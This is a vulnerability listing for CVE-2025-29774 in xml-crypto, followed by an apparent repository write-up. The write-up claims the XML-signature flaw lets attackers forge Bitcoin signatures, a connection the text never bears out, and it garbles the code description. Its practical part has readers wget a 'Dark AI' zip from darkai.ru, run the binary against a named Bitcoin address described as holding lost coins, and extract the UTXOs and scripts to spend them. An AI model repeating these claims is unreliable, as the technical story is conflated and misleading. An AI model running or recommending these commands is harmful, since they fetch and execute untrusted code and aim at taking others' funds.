xml-crypto Digital Signature Forgery Attack Vulnerability

漏洞信息

漏洞名称： xml-crypto Digital Signature Forgery Attack Vulnerability

漏洞编号：

CVE： CVE-2025-29774

漏洞类型： 代码注入

漏洞等级： 高危

漏洞描述： 受影响的产品：xml-crypto是一个用于在Node.js平台上对XML文档进行数字签名和加密的软件库。它广泛应用于企业集成解决方案、云服务和单点登录系统，如IBM App Connect Enterprise Certified Container等依赖xml-crypto进行SAML认证和授权的应用程序。

漏洞解释：此漏洞属于代码注入类型，具体表现为xml-crypto库中RSA-SHA1算法的签名验证不当，特别是在处理DigestValue节点时，攻击者可以插入XML注释而不破坏签名验证。这允许攻击者修改已签名的XML文档中的关键识别和访问控制属性，从而无需凭证或访问权限即可绕过安全控制。

影响分析：此漏洞允许绕过数字签名验证，导致伪造和修改已签名的消息，包括用于认证和授权的SAML响应。攻击者可以修改有效的已签名XML消息，使其通过签名验证，从而导致认证和授权绕过、权限提升和凭证伪造。这种漏洞可以被远程利用，无需用户交互，CVSS评分为9.3，属于高危漏洞。漏洞的影响范围包括使用xml-crypto进行XML签名验证的所有系统和应用程序，特别是那些在企业门户、单点登录系统和云服务中使用SAML认证的场景。

产品厂商： xml-crypto

产品名称： xml-crypto

来源： https://github.com/demining/Digital-Signature-Forgery-Attack

类型： CVE-2025:github search

仓库文件

Author.md
Digital_Signature_Forgery_Attack
Digital_Signature_Forgery_Attack_CVE_2025_29774_bug_SIGHASH_SINGLE.ipynb
README.md

来源概述

Digital Signature Forgery Attack: How CVE-2025-29774 Vulnerabilities and the SIGHASH_SINGLE Bug Threaten Multi-Signature Wallet Operational Methods with Fake RawTX

In this article, we will look at the cryptographic attack of digital signature forgery (Digital Signature Forgery Attack), its consequences pose a threat to the security of transactions in the Bitcoin network, since digital signatures confirm the ownership and authorization of cryptocurrency transfers. We will consider examples of the impact of such attacks on Bitcoin based on modern research and identified vulnerabilities.

A Digital Signature Forgery Attack is an attempt by an attacker to create a fake ECDSA digital signature that will be recognized as valid by the Bitcoin network. This attack allows transactions to be authorized without knowing the owner’s private key, which puts the security of funds in the BTC coin holder’s crypto wallet at risk.

In cryptography, a digital signature provides confirmation of the authenticity of a message or transaction. Signature forgery means that it is possible to create a “RawTX” pair that will be accepted by the system as valid, although in fact it was not created by the owner of the private key. This opens the way for fraud, theft of funds and violation of the integrity of the blockchain. Digital Signature Forgery Attack (DSFA) as a cryptographic attack is implemented in software components that use the xml-crypto library to verify signatures of XML documents on the Node.js platform.

https://youtu.be/qbu1m_C1wyA

First of all, this concerns enterprise integration solutions, cloud services and single sign-on systems, such as IBM App Connect Enterprise Certified Container and other applications that depend on xml-crypto for SAML authentication and authorization. Hardware vulnerabilities are not associated with specific physical devices, but are implemented in software products using the vulnerable library.

The vulnerabilities CVE-2025-29774 and CVE-2025-29775, known as the Digital Signature Forgery Attack, are implemented in the xml-crypto software library , a library for digitally signing and encrypting XML documents on the Node.js platform.

IBM App Connect Enterprise Certified Container is a data integration and processing software that uses xml-crypto to verify XML document signatures. The vulnerabilities allow digital signature verification to be bypassed, which leads to the possibility of forging and modifying signed messages, including SAML responses for authentication and authorization.
Systems and applications that use Node.js with the xml-crypto library to verify signed XML messages, especially in the context of SAML authentication (e.g., enterprise portals, single sign-on systems, cloud services). The vulnerability allows an attacker to modify valid signed XML messages so that they pass signature verification, leading to authentication and authorization bypass, privilege escalation, and credential spoofing.

The vulnerabilities are related to improper cryptographic signature verification in xml-crypto , specifically the handling of the DigestValue node, where an attacker can insert XML comments without breaking signature verification.
This allows critical identification and access control attributes in signed XML documents to be modified, resulting in the ability to bypass security without requiring credentials or access rights.

Thus, this code implements cryptographic signature and signature verification algorithms for various schemes (RSA with different SHA hashes and HMAC-SHA1), which allows them to be integrated into systems that require digital signature of data.

Critical vulnerability in signature-algorithms.ts code

The signature-algorithms.ts code is used to securely create and verify digital signatures, ensuring authenticity and integrity of data. ECDSA signatures provide authorship verification using a private key, and HMAC – integrity and authenticity verification using a secret key. The algorithms used comply with XML Digital Signature standards (the URIs of the algorithms point to W3C specifications).

Thus, the signature-algorithms.ts code implements cryptographic signature and signature verification algorithms for various schemes (ECDSA, RSA with different SHA hashes and HMAC-SHA1), which allows them to be integrated into systems that require digital data signature.

Basic functionality

Each class implements an interface SignatureAlgorithm and provides methods for:
- Create Signature ( getSignature): takes signature data and a private key, returns a digital signature in base64 format.
- Signature checks ( verifySignature): takes the input, public key and signature, returns a boolean value indicating whether the signature is correct.
- GetAlgorithmName ( getAlgorithmName): Returns a URI identifying the signature algorithm used.

Supported algorithms

RsaSha1 – signature using RSA and the SHA-1 hash function.
RsaSha256 – signature using RSA and SHA-256.
RsaSha512 – signature using RSA and SHA-512.
HmacSha1 – signature using HMAC based on SHA-1.

Technical details

For RSA signatures, the class crypto.createSign and crypto.createVerify with the corresponding algorithms are used (“RSA-SHA1”, “RSA-SHA256”, “RSA-SHA512”).
For HMAC signatures, it is used crypto.createHmac with the “SHA1” algorithm.
Signatures are encoded in base64 for ease of transmission and storage.
The methods are wrapped in a function createOptionalCallbackFunction, which probably allows them to be used with both callbacks and promises (details not in the code).

The use of the RSA-SHA1 algorithm in cryptographic signatures contains a vulnerability related to SHA-1 hash collisions. This allows an attacker to create two different messages with the same signature if he controls part of the data being signed.

Specifically, the problem is in the class RsaSha1:

const signer = crypto.createSign("RSA-SHA1");  // Vulnerable line

Also the second vulnerability is in the class RsaSha1:

const verifier = crypto.createVerify("RSA-SHA1");  // Vulnerable line

Why does this critical collision attack allow creating different data with the same hash?

SHA-1 Collisions : The SHA-1 algorithm is no longer considered secure.
RSA Context : When combined with RSA, this can lead to forged signatures on untrusted data (e.g. certificates or documents).
Recommendations : NIST and the security community recommend using SHA-256/SHA-512 over SHA-1.

Additional notes:

The (HMAC-SHA1) class HmacSha1is less vulnerable, but also obsolete. HMAC is more collision-resistant than “naked” SHA-1, but switching to SHA-256 is preferable.
The code contains modern implementations (RsaSha256/RsaSha512) that should be used instead of RsaSha1.

CVE-2025-29774 and CVE-2025-29775 are critical vulnerabilities in the xml-crypto library for Node.js related to improper verification of digital signatures in XML documents. Both vulnerabilities allow an attacker to modify signed XML messages in a way that goes unnoticed by signature verification.

Digital Signature Forgery Attack Mechanism

1. Vulnerabilities in RSA-SHA1 algorithms

In the provided code, the classes RsaSha1 use the legacy RSA-SHA1 algorithm for signing and verification:

const signer = crypto.createSign("RSA-SHA1");  // Vulnerable line №7
const verifier = crypto.createVerify("RSA-SHA1");  // Vulnerable line №17

SHA1 is considered cryptographically insecure, the main problem lies in the logic of the library’s processing of XML structures :

When creating a signature, the XML document goes through a canonicalization step (bringing it to a standard form, for example, removing spaces and comments).
When verifying a signature, the library does not take into account the difference between canonicalized and non-canonicalized versions of a document . This allows an attacker to modify the document (e.g. add comments or change the structure) without breaking the signature.

2. Example of operation

SignedInfo modification :
- The attacker adds additional nodes <SignedInfo> to the XML document , which results in an incorrect hash calculation during verification.
xml<Signature> <SignedInfo>...</SignedInfo>  <SignedInfo>...</SignedInfo>  </Signature>
Using a weak algorithm :
- The SHA1 algorithm is vulnerable to collisions, making it easy to create fake signatures for modified documents.

3. Consequences

Bypass authentication : Modifying attributes in SAML tokens or other access-related XML documents.
Privilege Escalation : Substituting a user ID for an administrator in the authorization system.
Mass Attacks : The vulnerability can be exploited remotely without user interaction (CVSS 9.3).

Technical details of the vulnerabilities:

CVE-2025-29774

Problem : Insufficient validation of XML document structure during signature verification.
Exploitation : Adding extra nodes or attributes to the signed part of the document.

CVE-2025-29775

Issue : Incorrect use of canonicalization context when computing a hash.
Exploitation : Modification of a document in non-canonicalized form after signing.

Recommendations for troubleshooting

Library update :
- For versions 2.x → 2.1.6, 3.x → 3.2.1, 6.x → 6.0.1.
Algorithm Replacement : typescript // Usage SHA-256 / SHA-1 const signer = crypto.createSign("RSA-SHA256");
Validating XML structure :
- Check if there is exactly one node <SignedInfo> in the signature.

Addressing these vulnerabilities is critical for systems that use XML signatures for authentication (e.g. SAML, SOAP).

The xml-crypto library is widely used to verify digital signatures in XML messages, including protocols such as SAML, SOAP, and others. It follows that the vulnerability potentially affects:

Software and services that use xml-crypto for XML signatures , including enterprise integration platforms and middleware (such as IBM App Connect Enterprise, where these vulnerabilities were reported).
Devices and systems that use XML signatures for authentication and authorization, including servers and gateways that support SAML.

Vulnerabilities CVE-2025-29774 and CVE-2025-29775 primarily affect software components and platforms that use the xml-crypto library to process XML signatures.
Known victims include IBM App Connect Enterprise and likely other Node.js-based enterprise solutions using xml-crypto .
There is currently no public data on specific brands of hardware devices affected by these attacks.

To assess the risk on specific devices, it is recommended to check whether they use vulnerable versions of xml-crypto or depend on similar XML signature mechanisms. For working with cryptocurrency wallets based on Node.js, IBM offers separate solutions, such as IBM Secure Bitcoin Wallet , an application based on Electrum Bitcoin Client that uses Node.js to interact with the Bitcoin network and manage the wallet.

In this solution, private keys and wallet can be stored and encrypted using IBM Cloud Hyper Protect Crypto Services (zHSM), which provides hardware-based secure storage of keys. Generation of private keys for Bitcoin wallets is usually implemented in specialized cryptographic libraries such as Electrum, bitcoinjs-lib, etc., which can be integrated into Node.js applications. IBM Secure Bitcoin Wallet uses a modified Electrum backend on Node.js for key and transaction management, through integration with IBM Cloud Hyper Protect Crypto Services, which provides hardware encryption and secure storage of private keys.

Practical part

From the theory of vulnerability CVE-2025-29775 it is known that an attacker can process an unupdated xml-crypto library for incorrect transaction values. Let’s move on to the practical part of the article and consider an example using a Bitcoin wallet: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe , where there were lost coins in the amount of: 0.059672 BTC as of July 2025 this amount is: 7, 052 USD

Let’s consider the format: Raw transaction binary and hex data that contain all the information about the transaction . It is needed to transmit, verify or create transactions at a low level and is the basis for the operation of the entire Bitcoin network. Regular users rarely encounter Raw transactions directly, but for developers and crypto enthusiasts, this is the main tool for full control over all transactions of the Bitcoin network.

To fully return UTXO objects in the Bitcoin network, we will use the Dark AI tool . UTXO is the main part of the data structure in the blockchain and represents the amount of BTC coins of the cryptocurrency that can be spent by the holder of the private key (controlling this Bitcoin address). Each UTXO is the output of a specific past transaction, which has never been used as an input in subsequent transactions.

Google Colab

Private key Debug: Incorrect generation of private keys, system vulnerabilities and errors in calculating the order of the elliptic curve secp256k1 threats to the Bitcoin ecosystem

https://colab.research.google.com/drive/1TKrJ0bKsNgc72H9UvzpCnh2YPmRsyPdW

1. Download and install the Dark AI tool

Detailed description of all terminal commands and actions

Teams:

!wget https://darkai.ru/repositories/neuralnet_tools.zip

wget— a command line utility for downloading files from the network via HTTP, HTTPS and FTP protocols.
We download the archive by specifying the URL .neuralnet_tools.zip
unzip— command to extract ZIP archives in the current directory.

This command extracts all files from neuralnet_tools.zip

!unzip neuralnet_tools.zip

Let’s run the command ls for quick and easy viewing

2. Launch the Dark AI tool

!./darkai

Let’s run the command to get information about the so-called unspent transaction outputs ( UTXO , decoding: Unspent Transaction Output ) for the specified Bitcoin address. This information is important for assessing the balance of the address and the possibility of conducting new transactions.

!./darkai -bitcoinaddress 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe

As a result, two UTXO objects were returned:

[
  {'output': '8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0', 'value': 677200},
  {'output': 'bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0', 'value': 5000000}
]

Each UTXO contains:

output — output identifier. Format: <txid>:<n>, where <txid>is a unique transaction hash, and <n> is the output number in the list of outputs for this transaction.
value — amount in satoshis (1 bitcoin = 100,000,000 satoshis).

Data decoding:

First UTXO
- Exit: 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd:0
- Amount: 677,200 satoshis
Second UTXO
- Exit: bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786:0
- Amount: 5,000,000 satoshis

Overall balance

The total available balance of an address is equal to the sum of all found UTXOs:

677 200 + 5 000 000 = 5 677 200 satoshis
In terms of bitcoins: 5,677,200/100,000,000 = 0.05677200 BTC

Technical Interpretation with Dark AI

We use the interpretation process to process the unupdated xml-crypto library to create invalid transaction values and send a large amount, the Dark AI algorithm will choose which UTXO to use (or combine both).

Sending funds: All specified UTXOs can be used as inputs when forming a new transaction, which will allow you to spend all or part of your balance.
Transparency: This report confirms that the address contains real Bitcoin funds and can be used to verify authenticity and solvency.

The Bitcoin address 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCehas two active UTXOs totaling 0.05677200 BTC . These funds can be used to make new transactions; both outputs are considered confirmed and unspent.

Deserialization of Bitcoin transaction

To get fragments of information about the output of a Bitcoin transaction, use the following commands, where the first output ( outs) from the transaction has a unique identifier8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd

!./darkai -deserialize 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afd

We get the structure of the response of the deserialization result:

{'value': 677200, 'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'}

value: 677200 — the amount of this output is expressed in satoshi (1 BTC = 100,000,000 satoshi).
script: a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287 — a script that defines the conditions for spending this output.

Detailed explanation of elements: Value field

Value: 677,200 satoshi.
This amount can be spent when creating the corresponding transaction if the conditions of the script are met.
Equivalent: 677,200/100,000,000 = 0.00677200 BTC.

Detailed explanation of elements: Script field

Script meaning: a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287
This is a script of type “scriptPubKey” – part of the transaction output structure that specifies who can spend these funds. The most important purpose is to ensure security and control over the disposal of funds.

Decoding the script

The script starts with a prefix a914...87, which corresponds to the P2SH (Pay to Script Hash) format :
- a9— OP_HASH160 (hash operator)
- 14— length of the next value (20 bytes = 40 hex characters)
- 06612b7cb2027e80ec340f9e02ffe4a9a59ba762— hash160 Bitcoin itself Wallet addresses where BTC coins are stored.
- 87— OP_EQUAL (a basic Bitcoin Script command operator that implements a comparison of two pieces of data to verify their identity)
This means that the recipient can spend the funds if they provide a script whose hash matches the value provided and provide valid signatures for that script.

Practical significance of the result

This output of the specified transaction contains 677,200 satoshi (0.00677200 BTC), which is protected by a P2SH type script.
To spend funds from such an output, you will need to know the original script and present the correct signatures – a typical situation for multi-signature wallets, smart contracts and other advanced security schemes.
This information is important for analyzing the structure of the transaction, verifying the purpose of the funds, and understanding the requirements for their subsequent use.

Deserialize a transaction by identifier

As a result of deserialization of the transaction by identifier, 8602122a7044b8795b5829b6b48fb1960a124f42ab1c003e769bbaad31cb2afdthe first output was obtained, containing the amount of 677,200 satoshi (0.00677200 BTC), protected by a P2SH script . To manage these funds, it will be necessary to present the destination script and correctly sign the unlocking transaction that meets the conditions of the specified hash.

Deserialization of the second Bitcoin transaction

To get fragments of information about the output of the original data ( output) of a Bitcoin transaction, apply the following commands, where the first output ( outs) from the transaction with a unique identifier bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786

!./darkai -deserialize bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786

Using the interpretation process, with the help of Dark AI using the deserialization function, we then obtain information about the structure of the first output element ( output) for the second transaction with the identifier
bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786.

Result:

{'value': 5000000, 'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'}

1. Detailed explanation of elements: Value field

Content: 5000000
This value is expressed in satoshi , the smallest indivisible unit of bitcoin; 1 BTC = 100,000,000 satoshi.
Purpose:
This amount is associated with a specific transaction output specified in the array elements 'outs'. It can only be spent if the conditions written in the script defined in the field are met 'script'.
Bitcoin conversion: 5,000,000 satoshi = 0.05 BTC

2. Detailed explanation of elements: Script field

Content: 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'
This is the so-called locking script or, otherwise, scriptPubKey – a script that specifies the conditions under which this output can be spent.

Decoding the script

The specified value corresponds to the standard script type in the Bitcoin network:

a9— operation code OP_HASH160 (produces RIPEMD-160 from SHA-256 from the next line).
14— length of the subsequent field: 20 bytes (40 hexadecimal characters).
06612b7cb2027e80ec340f9e02ffe4a9a59ba762— is a 20-byte hash that identifies either a Bitcoin wallet address or a script.
87— operation code OP_EQUAL.

Taken together, this entry means a P2SH address (Pay-to-Script-Hash). In this case, funds are assigned to a certain script combination, and to withdraw them, you will need to reveal the script whose hash is recorded here and present signatures (or other data) that satisfy the conditions of this script.

The most common uses of this scheme are for multi-signatures, simple and complex smart contracts, bilateral multi-signatures, conditional security schemes, and other advanced scenarios.

3. The practical meaning of the result, the size and purpose of the funds.

The transaction in question (with hash bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786 ) has an output in which 0.05 BTC (5,000,000 satoshis) are “locked” in the P2SH address corresponding to the hash06612b7cb2027e80ec340f9e02ffe4a9a59ba762
Conditions for spending:
To spend these funds, when forming a spending transaction, it is necessary to present not only a standard signature, as with a direct transfer, but also the script itself, the hash of which is embedded in this output, plus data (for example, a set of digital signatures) that correspond to the conditions of the script.
Security and flexibility:
This method allows for more complex logic to be implemented than sending directly to a regular Bitcoin address.

4. Registration of the exit to the level of compatibility with various services and wallets that support P2SH.

Transaction ID
bd992789fd8cff1a2e515ce2c3473f510df933e1f44b3da6a8737630b82d0786
contains an output in which
0.05 BTC (5,000,000 satoshi)
is secured to a P2SH script (Pay-to-Script-Hash) with a hash of
06612b7cb2027e80ec340f9e02ffe4a9a59ba762 .
To spend these funds, you must reveal the original script and fulfill its conditions (for example, present all signatures in a multi-signature).

Thus, the deserialization result reports the presence of a certain amount of bitcoins at a conditional (P2SH) address and defines strict rules for their spending, which plays a key role in the management and accounting of funds in the Bitcoin network.

P2SH (Pay-to-Script-Hash) locking script in Bitcoin network. What does this script mean?

The script 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'is chosen and used in this transaction output because it represents a typical P2SH (Pay-to-Script-Hash) locking script in the Bitcoin network.

Let’s look at it piece by piece:

a9— OP_HASH160: A hashing operation that first applies SHA-256 and then RIPEMD-160 to subsequent data.
14— hash length is 20 bytes (in hexadecimal format).
06612b7cb2027e80ec340f9e02ffe4a9a59ba762— a 20-byte hash of the script, known as the script hash .
87— OP_EQUAL: An operator that checks the equality of two values on the stack.

Thus, this script requires that at the time of use (spending funds) a script whose hash matches is presented 06612b7cb2027e80ec340f9e02ffe4a9a59ba762, and that the conditions of this script are met.

Why was this particular one chosen?

Convenience and security: P2SH allows complex funds management logic (such as multi-signatures or conditional payments) to be hidden in a hash, simplifying the interface for the sender and receiver.
Industry standard: P2SH has become a widely accepted standard because it simplifies the setup of complex security schemes and is compatible with most wallets and services.
Compactness: The block stores only the hash of a complex script, not the entire script – this saves space and increases efficiency.
Flexibility: The owner of the funds can create arbitrary conditions for spending – such as requiring multiple signatures, time delays, or other rules – and the hash of these conditions is stored here.

The script 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'is a P2SH locking script, which says that in order to spend 0.05 BTC, you need to provide the original script with the hash 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 and fulfill the conditions specified in it. This provides a balance between convenience, security and functionality – the main reason for choosing this particular script in this transaction. The hash 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 in the P2SH script is the result of a specific hashing of the original script (redeem script) , which determines the conditions for spending funds from this output.

Why this hash and not another?

A hash is a digital fingerprint of a script that specifies the rules for spending.
When creating a P2SH address or output, the script (the conditions for spending Bitcoin) is first written explicitly, then two hashing algorithms are applied:
- SHA-256 from the script,
- Then RIPEMD-160 the SHA-256 result.
  The resulting 20-byte hash is 06612b7cb2027e80ec340f9e02ffe4a9a59ba762. This hash uniquely identifies the exact scenario for which it was generated.
Uniqueness and Immutability
Cryptographic hash functions have an “avalanche effect” property, whereby even a minimal change to the original script will produce a completely different hash. Therefore, this hash is unique and unforgeable in the context of the original script.
The purpose of using a hash is to ensure compactness and security.
Instead of storing the full script in each output, which can be complex and take up a lot of space, only its hash is stored in the block. This saves space and increases privacy – the script itself is revealed only when funds are spent and only to those who fulfill the conditions.
The hash selection is the result of a specific script defined by the creator of the address or wallet.
The developer or owner of the funds creates a script with the desired conditions (e.g. multi-signature, time delay, other logical conditions). The assigned script is hashed and this hash is tied to the transaction output. Thus, there is no arbitrary hash selection – it is determined by the content of the original script and the cryptographic algorithm.

This hash is strictly linked to a specific script that the address owner has installed to protect their funds.
It was generated using cryptographic hash functions ( SHA-256 + RIPEMD-160)from the original redeem script, so it is not possible to randomly or arbitrarily select a different hash.
This hash is a reflection of the unique combination of spending conditions, and that is why it ended up in the transaction output script.a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287

Thus, the choice of this particular hash is dictated by the need for an accurate and secure linking of the output with specific spending conditions that control access to funds in the blockchain. All this is ensured by the properties of cryptographic hash functions, their uniqueness, and the impossibility of reverse recovery of the original data.

P2SH Mechanism: Meaning, Working Principle and Security in Bitcoin Network

Bitcoin developers have written the P2SH (Pay-to-Script-Hash) mechanism into the code as a key innovation that ensures security and expands the capabilities of the blockchain network. Let’s consider the structure and operating principle of this script, its difference from classic transactions, as well as the reasons for choosing this approach to storing and protecting digital assets.

Traditionally, Bitcoin transactions have worked using the Pay-to-Pubkey-Hash (P2PKH) scheme – where funds are “locked” using the recipient’s public key hash. To spend these funds, the user must provide their digital signature and public key, which are verified by the network.

However, beyond P2PKH, the interface was limited, as Bitcoin Script allows for much more complex spending conditions, from multi-signatures to time locks and other smart contract agreements. The problem was that long and complex scripts inevitably increased the size of transactions and reduced their usability.

It was to simplify interaction with such complex scenarios that the P2SH concept was introduced in 2012 , standardized in BIP 16 by Gavin Andresen. The essence of P2SH comes down to replacing the full script of spending conditions in scriptPubKey with its cryptographic hash – the so-called script hash.

How does the P2SH output script structure work?

Let’s look at the script specified as a result of deserialization:

OP_HASH160 06612b7cb2027e80ec340f9e02ffe4a9a59ba762 OP_EQUAL

This script differs from the standard P2PKH in that instead of a public key hash, it stores a hash of a redeemScript – a set of conditions under which funds can be spent.

OP_HASH160 – hashes the data (in this case redeemScript) first with the SHA-256 algorithm, and then with RIPEMD-160.
06612b7cb2027e80ec340f9e02ffe4a9a59ba762 — 20-byte hash redeemScript.
OP_EQUAL – checks if the provided redeemScript is equal to this hash.

The process of spending funds via a P2SH output

To spend such funds, it is necessary to transmit in the inputs (scriptSig) of the transaction referring to this output:

Serialized redeemScript – the original script whose conditions are encoded in a hash.
Unlock data – signatures or other evidence that meet the conditions of the redeemScript.

When processing a transaction, network nodes:

Hash the redeemScript and compare it with the hash specified in output.
If the hashes match (i.e. OP_EQUAL returns true), then redeemScript is deserialized and executed.
A transaction is considered valid if the redeemScript is executed correctly, i.e. all spending conditions are met.

P2SH thus shifts the responsibility for presenting and verifying the terms of the spend from the sender (who creates the required script) to the spender.

The advantages and importance of choosing such a mechanism

1. Flexibility and complex scenarios

P2SH allows you to create addresses with arbitrary, often multi-level conditions – for example, a multi-signature requirement (2 out of 3, 3 out of 5, etc.), time limits, distribution logic, and much more. In this case, the sender simply sends funds to a compact hash address, without going into technical details.

2. Saving space

Instead of storing the full script in the blockchain, only its hash is stored in the transaction. This reduces the load on the network, reduces the size of blocks and speeds up the verification of transactions.

3. Increased security

Since the redeemScript is only revealed and verified at the time of spending, it increases the confidentiality of the terms and makes unauthorized access attempts more difficult. The use of cryptographic hash functions guarantees protection against forgery and modification – any slight deviation in the script will result in a different hash and the network will refuse to accept the transaction.

4. Convenience for users and programmers

P2SH standardizes and simplifies the use of complex smart contracts in Bitcoin, simplifying integration and increasing compatibility with a variety of wallets and services.

Example of use: multi-signature wallets

A classic example is a wallet that requires signatures from two of five participants to complete a transaction. With P2SH:

The output contains the hash of the corresponding script.
To spend funds, you need to pass the full multi-signature enable script in scriptSig with signatures.
The network checks the consistency of hashes and the validity of signatures.

This makes P2SH ideal for corporate accounts, joint ventures, and other situations where access control is required. The Pay-to-Script-Hash (P2SH) mechanism is a fundamental part of the Bitcoin architecture, providing a balance between:

Security (protecting funds through strict conditions and cryptography),
Efficiency (storing only the hash, not all the details),
Flexibility (support for any, even complex, spending conditions),
Convenience (simple address format and access standard).

Cryptanalysis of the extraction of the first transaction input ( `ins`)

Let’s run a command to obtain information about one of the inputs of a transaction with a hash 6102bfd4bad33443bcb99765c0751b6b8e4e65f4db4e3b65324c5e9e3dac8132. Analysis of such an input is important for understanding the mechanism of authorization of spending funds at the script level.

!./darkai -scriptsig 6102bfd4bad33443bcb99765c0751b6b8e4e65f4db4e3b65324c5e9e3dac8132

The result of extracting the first input of the transaction ( ins) is presented as follows:

{
  'script': '00483045022100e5d7c59ea1fb5d0285e755dfc09634e1e3af36d12950b9b5d5f92b136021b3d202202c181129443b08dcfb8d9ced30187186c57c96f9cdb3f3914e0798682ea35d2b03493046022100e1f8dbad16926cfa3bf61b66e23b3846323dcabf6c75748bcfad762fc50bfaf402210081d955160b5f8d2b9d09d8838a2cf61f5055009d9031e0e106e19ebab234d949034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae',
  'outpoint': {
    'index': 1,
    'hash': 'ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577'
  },
  'sequence': 4294967295
}

1. Detailed analysis of ScriptSig components ( `script`)

The value of the field scriptis the scriptSig , which is used to unlock the corresponding previous transaction output.
The content is a long sequence of bytes in hexadecimal format.
In this case, it is a five-component script, which includes:
- Standard digital signatures according to the ECDSA protocol, typically to confirm ownership of a private key.
- Public keys required to verify the signature.
- There may be a structure indicating multi-signature operations (multiple public keys and signatures).

Analysis of the script structure:

Starts with 00, which in the context of scriptSig can mean OP_0 , traditionally used in multi-signature scenarios (e.g. in the case of the Pay-to-Script-Hash multi-signature standard, where a stub is needed).
Next come the signatures in DER format (e.g. 3045...), which typically consist of a series of bytes containing the signature details.
The signatures are followed by public keys (in length and structure, most likely in a compressed format, since about 33 bytes), which confirm that the signatures belong to the correct owners.
In general, the script format corresponds to redeemScript or the construction typical for P2SH multi-signature transactions.

2. Outpoint (`outpoint`)

Contains data about the previous output that is used in this input:
- 'hash': 'ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577'— is the hash of the previous transaction.
- 'index': 1– indicates the second output (numbered from zero), which is used for unlocking.
Thus, the input references a specific output from a previous transaction, proving that the author of the transaction has the right to spend it.

3. Sequence (`sequence`)

The value 4294967295 (0xFFFFFFFF)is a maximum 32-bit number.
In Bitcoin, this field will serve to indicate that the input is not participating in the Replace-By-Fee (RBF) mechanism or does not have a time/lock on Relative Timelock.
Often used by default for fixed inputs.

The Importance of scriptSig in a Security Context

ScriptSig is the data for unlocking funds that are protected by the locking script of the previous exit.
In the case of P2SH transactions (often for multi-signature), scriptSig contains:
- Signatures of participants confirming the right to spend funds.
- The original redeemScript, the hash of which is specified in the locking script of the previous output.
A successful scriptSig check ensures that the author of the transaction actually has the necessary authority to dispose of the funds.

Cryptanalysis of the extraction of the first transaction input ( ins) with the given transaction hash showed that:

The input of the first transaction contains a complex unlock script, including digital signatures and public keys.
A reference to a specific output of another transaction is used ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577:1.
The maximum sequence value indicates the absence of special locks or RBF.
Presumably, we are talking about a P2SH multi-signature transaction, where several signatures are required to confirm the spending of funds.

Thus, the obtained data allows for a deeper understanding of the mechanics of checking the rights to spend funds, is used to ensure the security of the Bitcoin network, as well as in the development and audit of smart contracts based on Bitcoin scripts.

Detailed analysis of the result of extracting the second output ( `outs`)

Let’s run the command to get information about one of the outputs of the transaction with the identifier ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577.

!./darkai -redeemscript ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577

outs Specifically, the second output ( ) of this transaction, the element with index 1, was extracted .

The result obtained:

{
  'value': 350000,
  'script': 'a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287'
}

1. Detailed analysis of the received data field `value`

Size: 350,000 satoshis.
This amount of funds is in the second output of the specified transaction and can be spent if the conditions specified in the corresponding script are met.
Translation in BTC: 350,000 satoshi = 0.0035 BTC

2. Field value `script`

Characteristic:
The script a91406612b7cb2027e80ec340f9e02ffe4a9a59ba76287is a classic locking script (scriptPubKey) of the P2SH (Pay-to-Script-Hash) format .
Script transcript:
- a9— OP_HASH160 is an operator that first applies SHA-256 and then RIPEMD-160 to the input data.
- 14— the length (20 bytes) of the next value is the hash size.
- 06612b7cb2027e80ec340f9e02ffe4a9a59ba762— 20-byte hash, also known as script hash , is a unique representation of the redeem script that controls the spending of these funds.
- 87— OP_EQUAL is an operator that compares two values and returns true if they are equal.

Thus, the script requires that in order to unlock (spend funds), the user presents a redeem script whose hash matches this value.

The meaning and role of redeem script in the context of P2SH

Redeem script is an original script that sets the conditions for spending funds, for example, multi-signature, a complex scenario with a time limit, etc.
Transaction outputs only store the hash from the redeem script, saving space and protecting the details of the conditions.
To use the funds invested in this output, when creating a new transaction, the user must provide in scriptSig a serialized redeem script that is correctly decoded and verified by the network.

Overall meaning of the result

The transaction ID ec2a40cac3ac5dadf1d31f3cad03bdc8465caab5acbc5407ee7f4a7400aab577is associated with an output that contains 0.0035 BTC.
These funds are tied to a P2SH address controlled by a script with a hash 06612b7cb2027e80ec340f9e02ffe4a9a59ba762.
In order to spend these funds, you must present a redeem script corresponding to this hash and fulfill the conditions laid out in it.

The significance of the information obtained in a broader context

